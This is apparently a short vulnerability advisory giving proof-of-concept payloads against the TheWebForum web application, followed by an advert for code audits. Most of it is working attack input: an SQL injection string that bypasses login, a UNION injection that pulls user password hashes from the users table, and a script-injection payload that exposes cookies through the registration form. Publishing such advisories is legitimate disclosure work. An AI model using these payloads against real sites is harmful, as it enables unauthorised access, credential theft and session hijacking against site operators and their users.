PoC/Exploit for Script Insertion and Auth Bypass in TheWebForum
Published Proof of Concept code - Script Insertion and Auth Bypass in TheWebForum.
- Description
- Available
- Solution
- Not available - check TheWebForum Group website
Authentication bypass example (SQL Injection):
http://host/twf/login.php
User Name: a' or 'a'='a'/*
Password: anypassword
Get user's password hash example (SQL Injection):
http://host/twf/login.php
User Name: a' union select N,password,3 from users/*
User name will contain password's hash of user with ID=N
JavaScript insertion (XSS):
http://host/twf/register.php
Website value: <script>alert(document.cookie)</script>
Order Source Code Audit made by eVuln
Protect against attacks by source code audit of your site or web application made by Aliaksandr Hartsuyeu.The task will be done by experts in web application security.